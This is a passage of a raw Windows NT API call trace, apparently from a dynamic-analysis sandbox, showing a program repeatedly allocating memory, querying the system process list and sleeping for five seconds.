BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.029] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.040] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.076] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 